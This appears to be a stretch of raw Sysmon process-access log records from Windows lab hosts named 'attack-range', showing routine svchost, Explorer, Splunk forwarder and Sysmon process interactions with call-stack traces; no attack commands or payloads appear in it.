11:03:48.095{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C100-000000003802}5080C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000294770Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:03:48.095{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C100-000000003802}5080C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000294769Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:03:48.095{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000294768Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:03:48.095{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000294767Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:03:48.095{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000294766Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:03:48.095{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000294765Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:03:48.095{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000294764Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:03:48.095{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000294763Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:03:48.095{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000294762Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:03:48.095{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000294761Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:03:48.095{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000294760Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:03:48.095{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000294759Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:03:48.095{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000294758Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:03:48.095{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000294757Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:03:48.095{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000294756Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:03:48.095{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000294755Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:03:48.095{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000294754Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:03:48.095{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000294753Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:03:48.095{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000294752Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:03:48.095{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000294751Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:03:48.095{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000294750Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:03:48.095{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000294749Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:03:48.095{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000294748Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:03:48.095{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000219013Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:03:49.785{4F8D34B0-1495-6216-B804-000000003902}26284016C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000219012Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:03:49.425{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-1495-6216-B804-000000003902}2628C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000219011Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:03:49.425{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000219010Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:03:49.425{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000219009Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:03:49.425{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000219008Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:03:49.425{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000219007Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:03:49.425{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32